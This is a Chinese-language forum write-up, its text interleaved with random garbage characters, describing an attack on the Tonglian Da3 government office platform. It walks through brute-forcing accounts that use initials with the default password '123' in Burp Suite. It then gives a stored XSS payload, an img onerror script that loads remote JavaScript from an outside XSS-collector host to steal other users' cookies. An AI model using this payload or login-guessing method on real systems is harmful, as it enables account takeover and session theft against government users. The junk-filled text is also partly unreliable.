. e( W7 F+ U# ~& i
& i: q$ \' j. W3 u5 | 同联Da3协同办公平台后台通用储存型xss漏洞
. O+ A" s% |, x) B) l5 ^ v$ o
+ r/ ?' y0 W& H6 ?
) |) S$ {( S8 R$ B* L% a& m; V 平台简介:
5 ]4 q0 h1 u9 v+ e% t
$ w1 J3 _ k y& V1 X 4 ^) P; p+ y6 P) ^ l n5 \
2 o7 T9 B3 ?) y$ S% ~% c
6 ~! f+ \. {' W) R
' A3 F" Q. L! H3 O2 n 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# e# s! W) h7 g0 c! p {# e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ o4 z7 y/ K' t% g9 p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!3 Z5 X& J$ s, U% z
) U: u7 c0 j: a1 |* y V1 L 0 ?5 } k9 Q, T- j7 a
6 N; P3 r" o4 w& U% G% k( [6 V
8 ]5 @3 z$ |: i- l& @) j* p
. e: \1 F, H3 n. V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
y4 ^& H. G1 p; I x0 \
3 V. Q/ h0 n1 g8 n/ L- z. B7 I
7 d2 b+ o; t: g; G
6 ?6 y$ z$ p8 ~! P0 R
/ t7 w" Q' k) D; u5 P( x; H6 o: s
- d+ s$ g, h% r7 Q% N http://1.1.1.1:7197/cap-aco/#(案例2-)
. `) D( B1 L% O4 v- Y- X
$ F1 ]4 c! a+ v4 ?' V" ]
- i- `) P" p y. }! p& C http://www.XXOO.com (案例1-官网网站)) Z" }( E3 z" d8 h& ]# {7 Z5 U; D- ]
% l$ P: S' u* M) E; c4 J 8 Z5 }) S1 R# ~
漏洞详情:, P5 T; u* O; C! R% E: V$ {
6 W! P- F4 z- t
% E1 n# H) z7 Q( M! A, a2 X 案例一、) l2 F' k# r* c( z( D
$ v0 u7 e: M$ U
" r, y' X8 P( `: y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' R3 L9 V6 Y0 j
2 [ [5 ]# E) F9 V, `- I
! h+ F, P% G) e% A' \' `3 I8 H 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. q1 H0 o/ P7 C9 @ q) m- Z! z% T1 ?
! k( K* L5 ?) [5 w0 y 9 S& [3 V# \, P; k# H
7 J& R/ b$ N( _& e7 ]- H) O
; L& Q- Y, T6 W) |
% N1 |* ]7 L+ L ~5 H 
# Q& I! U2 U6 d( ^& d* W; b
$ z" B4 J+ I) G $ ?3 e, W% F O9 i* t6 k2 I
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
6 n" y' r- [' A3 G, T K/ F
7 W( g! d% t; c% Z9 _2 b 2 `" u: A/ R `" @/ g
# n. \% C* }) V: j2 {" f: v: e3 ^/ e
$ ]$ I2 ~4 X4 `+ o" r
% E( b C* q% S: e5 H1 D4 }2 ^
; _8 {8 o! B! e3 c
: E5 r$ T4 k n0 C
; Q0 u; f* j; S, f6 r d 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 9 \: f, x9 t: K- j/ B s: e
# P7 @! v1 Q. i8 F ( y7 P' W: o6 K9 a. u! K7 q
7 [* S* j6 w- L% _+ h" q& `
8 @; T( i8 C g/ y$ ]2 x
' Q6 N' G3 M/ ~
<img src=x
# Y/ U% f# H1 t5 J" sonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 7 K1 R; ]" ?- P' _& e1 v8 L R T
) m0 F4 I# z- p4 O' }8 H$ y
/ F% `7 ~6 ?# r F6 S9 I& F
, w. |: H; g' z$ W% B
! ^; s. O+ B$ V; q- P6 [
! ?1 P- s' `0 Z: ]7 K x/ x 然后发送,接收cookie如图: $ b$ L' R Q8 e0 S2 z6 V
* H6 ]2 _. Q6 {3 R; j! ~
) \+ ?2 D8 B7 W6 ?+ { A; ~6 s/ I! I# i
7 P6 y. z) i! R( x
3 _9 n8 ^; X* F3 F% R' W# z! p
$ ] o/ ^) [% T9 l/ B7 \" k% e : |& \* c+ U! V/ u. V, k/ ?
+ M3 Q3 ^8 @$ _- H ( @( f' h3 s7 H# z
5 J4 i9 o# j' I E3 t/ b
" O& F% G' M6 w( _; e 2 p% h& [* @, S" A1 ]( R, }7 |
X( ]# ^7 A! d9 @
+ _2 j/ g }$ T. @; H
' L# Y5 v( |: `$ S; s 
x- T+ {1 m* s, n! i$ o
. H* w6 s) V, @& H+ H + N# i- {/ I: r2 H! `( B8 G
5 b0 m- c: L( J; @
- |5 T* z- |3 e2 B
' N. C$ |0 [$ ]7 s
4 q1 U2 c _+ e8 `/ B% i- M0 [
' s6 o+ k4 m, }( `% U2 S2 ?! C# m$ ]3 h . [! N E) a3 B; Y
案例2、
2 w- }' |3 A1 ?5 [% g% A
6 C" q3 r4 \. V+ T' ~ + V9 `. J7 m; d1 g- P- F
前面步骤都一样,下面看效果图:
( D' y) ~: \. |2 a3 c
/ m' a' N6 |, X3 a* o- _! F
) q, }% D0 D% J
/ P# l1 H: o `. _* o3 [# D
$ Q4 g# `9 J3 Z* D: z
8 h8 h4 S+ K! {% v! ~8 l# Z$ N) M 
% B" ]7 T. o% q7 E. u
6 G5 j5 m$ _/ y X% y: ^, ?
& A1 p. c5 d$ p+ o3 G
. `; t% Q( _0 l2 N. X" ~1 n
0 b |( C9 A7 K" C$ V/ C- ?- x! f
1 x* c% ~( t: [% ] 3 J' ~8 V0 O8 z2 J$ ^
. _ Z) a/ A+ G8 {
1 y' b% Q- n7 n/ s) O 
# [/ K4 r5 j! R3 V& r5 y! s
f- c2 i9 F) P9 I8 N 3 [3 B# H+ C4 Z* ]6 Z; t, ?9 Y% |
: g; b" O$ I* X" `& g
: O3 R' m* w0 z2 }4 G1 g0 Q9 K& k
$ s% U/ l H% c9 S" E* Q0 b: E* y
; T/ U2 J; q3 f% W. i
9 h8 u/ u y% ]+ s5 x+ ]7 {2 B
0 ^) u4 E& O- K; w( _7 Q( h4 _ ! @$ r" X/ B2 s2 G
2 q" M _) i4 M 9 D' \: k3 E( d6 I% u# f
& f' N0 T/ ]/ }2 l% r
8 L- I; \8 ]2 [+ n. U3 [: H2 k: r